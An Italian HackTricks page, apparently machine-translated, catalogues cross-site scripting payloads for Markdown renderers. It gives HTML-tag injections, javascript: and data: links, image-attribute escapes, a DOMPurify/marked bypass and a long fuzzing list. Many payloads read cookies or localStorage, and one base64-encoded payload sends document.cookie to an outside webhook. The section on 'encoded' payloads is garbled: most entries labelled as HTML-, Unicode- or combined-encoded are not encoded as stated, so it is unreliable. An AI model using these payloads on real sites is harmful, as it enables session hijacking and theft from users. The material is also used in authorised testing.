14 KiB
XSS in Markdown
Impara l'hacking di AWS da zero a eroe con htARTE (HackTricks AWS Red Team Expert)!
- Lavori in una azienda di sicurezza informatica? Vuoi vedere la tua azienda pubblicizzata su HackTricks? o vuoi avere accesso all'ultima versione di PEASS o scaricare HackTricks in PDF? Controlla i PACCHETTI DI ABBONAMENTO!
- Scopri The PEASS Family, la nostra collezione di esclusive NFT
- Ottieni il merchandising ufficiale di PEASS & HackTricks
- Unisciti al 💬 gruppo Discord o al gruppo Telegram o seguimi su Twitter 🐦@carlospolopm.
- Condividi i tuoi trucchi di hacking inviando PR al repo hacktricks e al repo hacktricks-cloud.
Se hai la possibilità di iniettare codice in markdown, ci sono alcune opzioni che puoi utilizzare per attivare un XSS quando il codice viene interpretato.
Tag HTML
Il modo più comune per ottenere un XSS in markdown è iniettare tag HTML comuni che eseguono javascript, perché diversi interpreti di markdown accetteranno anche HTML.
<!-- XSS with regular tags -->
<script>alert(1)</script>
<img src=x onerror=alert(1) />
Puoi trovare ulteriori esempi nella pagina principale di XSS di hacktricks.
Link Javascript
Se i tag HTML non sono un'opzione, puoi sempre provare a giocare con la sintassi del markdown:
<!-- markdow link to XSS, this usually always work but it requires interaction -->
[a](javascript:prompt(document.cookie))
<!-- Other links attacks with some bypasses -->
[Basic](javascript:alert('Basic'))
[Local Storage](javascript:alert(JSON.stringify(localStorage)))
[CaseInsensitive](JaVaScRiPt:alert('CaseInsensitive'))
[URL](javascript://www.google.com%0Aalert('URL'))
[In Quotes]('javascript:alert("InQuotes")')
[a](j a v a s c r i p t:prompt(document.cookie))
[a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)
[a](javascript:window.onerror=alert;throw%201)
Abuso della sintassi dell'evento Img
L'abuso della sintassi dell'evento Img è una tecnica comune utilizzata per eseguire attacchi di cross-site scripting (XSS). Questa tecnica sfrutta la possibilità di inserire codice JavaScript all'interno dell'attributo onerror
di un elemento <img>
. Quando l'immagine non viene caricata correttamente, il codice JavaScript viene eseguito nel contesto del sito web ospitante, consentendo all'attaccante di eseguire azioni dannose.
Ecco un esempio di come viene utilizzata questa tecnica:
[![Immagine](https://example.com/image.jpg" onerror="alert('XSS')")](https://example.com)
In questo esempio, l'attributo onerror
viene utilizzato per inserire il codice JavaScript alert('XSS')
. Quando l'immagine non viene caricata correttamente, viene visualizzato un popup con il messaggio "XSS".
Gli attaccanti possono sfruttare questa tecnica per rubare informazioni sensibili, eseguire azioni dannose o compromettere la sicurezza del sito web. Per mitigare questo tipo di attacco, è importante validare e filtrare correttamente i dati di input e utilizzare tecniche di sanitizzazione per evitare l'esecuzione di codice JavaScript non autorizzato.
![Uh oh...]("onerror="alert('XSS'))
![Uh oh...](https://www.example.com/image.png"onload="alert('XSS'))
![Escape SRC - onload](https://www.example.com/image.png"onload="alert('ImageOnLoad'))
![Escape SRC - onerror]("onerror="alert('ImageOnError'))
Bypass del Markdown del Sanitizzatore HTML
Il seguente codice sta sanitizzando l'input HTML e poi passandolo al parser Markdown, quindi, è possibile attivare XSS sfruttando le interpretazioni errate tra Markdown e DOMPurify
<!--from https://infosecwriteups.com/clique-writeup-%C3%A5ngstromctf-2022-e7ae871eaa0e -->
<script src="https://cdn.jsdelivr.net/npm/dompurify@2.3.6/dist/purify.min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/marked@4.0.14/lib/marked.umd.min.js"></script>
<script>
const qs = new URLSearchParams(location.search);
if (qs.get("content")?.length > 0) {
document.body.innerHTML = marked.parse(DOMPurify.sanitize(qs.get("content")));
}
</script>
Esempi di payload:
- Payload di base:
<script>alert('XSS')</script>
- Payload con codifica HTML:
<script>alert('XSS')</script>
- Payload con codifica URL:
%3Cscript%3Ealert('XSS')%3C/script%3E
- Payload con codifica JavaScript:
%3Cscript%3Ealert(%27XSS%27)%3C/script%3E
- Payload con codifica HTML e JavaScript:
<script>alert('XSS')</script>
- Payload con codifica CSS:
expression(alert('XSS'))
- Payload con codifica HTML e CSS:
expression(alert('XSS'))
- Payload con codifica HTML, CSS e JavaScript:
expression(alert('XSS'))
- Payload con codifica HTML, CSS, JavaScript e URL:
expression(alert(%27XSS%27))
- Payload con codifica HTML, CSS, JavaScript, URL e Unicode:
expression(alert(%27XSS%27))
- Payload con codifica HTML, CSS, JavaScript, URL, Unicode e base64:
expression(atob(%27YWxlcnQoJ1hTUycpJw==%27))
- Payload con codifica HTML, CSS, JavaScript, URL, Unicode, base64 e commenti:
expression(atob(%27YWxlcnQoJ1hTUycpJw==%27))//'
- Payload con codifica HTML, CSS, JavaScript, URL, Unicode, base64, commenti e tag HTML:
expression(atob(%27YWxlcnQoJ1hTUycpJw==%27))//'</script><script>alert('XSS')</script>
<div id="1
![](contenteditable/autofocus/onfocus=confirm('qwq')//)">
-----------------------------------------------
<a title="a
<img src=x onerror=alert(1)>">yep</a>
------------------------------------------------
[x](y '<style>')<!--</style><div id="x--><img src=1 onerror=alert(1)>"></div>
----------------------------------------------
[<p x='<style onload=eval(atob(/bG9jYXRpb249YGh0dHBzOi8vd2ViaG9vay5zaXRlL2FiM2IyYjg5LTg1YTktNGU0YS1hNjg0LTUxN2M1ZjQwNmZmMj9mPWArZW5jb2RlVVJJQ29tcG9uZW50KGRvY3VtZW50LmNvb2tpZSk/.source))>](#'></p>)
----------------------------------------------
`<p x="`<img src=x onerror=alert(1)>"></p>
Fuzzing
Il fuzzing è una tecnica di test che consiste nell'inviare dati casuali o semi-casuali a un'applicazione al fine di individuare eventuali vulnerabilità. Questo può essere fatto inviando input non validi o inaspettati per verificare come l'applicazione gestisce tali dati. Il fuzzing può essere utilizzato per individuare vulnerabilità come buffer overflow, XSS (Cross-Site Scripting) e SQL injection.
<!--
Fuzzing examples from
- https://github.com/cujanovic/Markdown-XSS-Payloads/blob/master/Markdown-XSS-Payloads.txt
- https://makandracards.com/makandra/481451-testing-for-xss-in-markdown-fields
-->
[a](javascript:prompt(document.cookie))
[a](j a v a s c r i p t:prompt(document.cookie))
![a](javascript:prompt(document.cookie))\
<javascript:prompt(document.cookie)>
<javascript:alert('XSS')>
![a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)\
[a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)
[a](javascript:alert('XSS'))
![a'"`onerror=prompt(document.cookie)](x)\
[citelol]: (javascript:prompt(document.cookie))
[notmalicious](javascript:window.onerror=alert;throw%20document.cookie)
[test](javascript://%0d%0aprompt(1))
[test](javascript://%0d%0aprompt(1);com)
[notmalicious](javascript:window.onerror=alert;throw%20document.cookie)
[notmalicious](javascript://%0d%0awindow.onerror=alert;throw%20document.cookie)
[a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)
[clickme](vbscript:alert(document.domain))
_http://danlec_@.1 style=background-image:url();background-repeat:no-repeat;display:block;width:100%;height:100px; onclick=alert(unescape(/Oh%20No!/.source));return(false);//
<http://\<meta\ http-equiv=\"refresh\"\ content=\"0;\ url=http://danlec.com/\"\>>
[text](http://danlec.com " [@danlec](/danlec) ")
[a](javascript:this;alert(1))
[a](javascript:this;alert(1))
[a](javascript:this;alert(1))
[a](Javascript:alert(1))
[a](Javas%26%2399;ript:alert(1))
[a](javascript:alert(1))
[a](javascript:confirm(1)
[a](javascript://www.google.com%0Aprompt(1))
[a](javascript://%0d%0aconfirm(1);com)
[a](javascript:window.onerror=confirm;throw%201)
[a](javascript:alert(document.domain))
[a](javascript://www.google.com%0Aalert(1))
[a]('javascript:alert("1")')
[a](JaVaScRiPt:alert(1))
![a](https://www.google.com/image.png"onload="alert(1))
![a]("onerror="alert(1))
</http://<?php\><\h1\><script:script>confirm(2)
[XSS](.alert(1);)
[ ](https://a.de?p=[[/data-x=. style=background-color:#000000;z-index:999;width:100%;position:fixed;top:0;left:0;right:0;bottom:0; data-y=.]])
[ ](http://a?p=[[/onclick=alert(0) .]])
[a](javascript:new%20Function`al\ert\`1\``;)
[XSS](javascript:prompt(document.cookie))
[X
[XSS](javascript:alert('XSS'))
[XSS]: (javascript:prompt(document.cookie))
[XSS](javascript:window.onerror=alert;throw%20document.cookie)
[XSS](javascript://%0d%0aprompt(1))
[XSS](javascript://%0d%0aprompt(1);com)
[XSS](javascript:window.onerror=alert;throw%20document.cookie)
[XSS](javascript://%0d%0awindow.onerror=alert;throw%20document.cookie)
[XSS](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)
[XSS](vbscript:alert(document.domain))
[XSS](javascript:this;alert(1))
[XSS](javascript:this;alert(1))
[XSS](javascript:this;alert(1))
[XSS](Javascript:alert(1))
[XSS](Javas%26%2399;ript:alert(1))
[XSS](javascript:alert(1))
[XSS](javascript:confirm(1)
[XSS](javascript://%0d%0aconfirm(1);com)
[XSS](javascript:window.onerror=confirm;throw%201)
[XSS](<28>javascript:alert(document.domain))
![XSS](javascript:prompt(document.cookie))\
![XSS](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)\
![XSS'"`onerror=prompt(document.cookie)](x)\
Impara l'hacking di AWS da zero a eroe con htARTE (HackTricks AWS Red Team Expert)!
- Lavori in una azienda di sicurezza informatica? Vuoi vedere la tua azienda pubblicizzata in HackTricks? o vuoi avere accesso all'ultima versione di PEASS o scaricare HackTricks in PDF? Controlla i PIANI DI ABBONAMENTO!
- Scopri La Famiglia PEASS, la nostra collezione di esclusive NFT
- Ottieni il merchandising ufficiale di PEASS & HackTricks
- Unisciti al 💬 gruppo Discord o al gruppo Telegram o seguimi su Twitter 🐦@carlospolopm.
- Condividi i tuoi trucchi di hacking inviando PR al repo hacktricks e al repo hacktricks-cloud.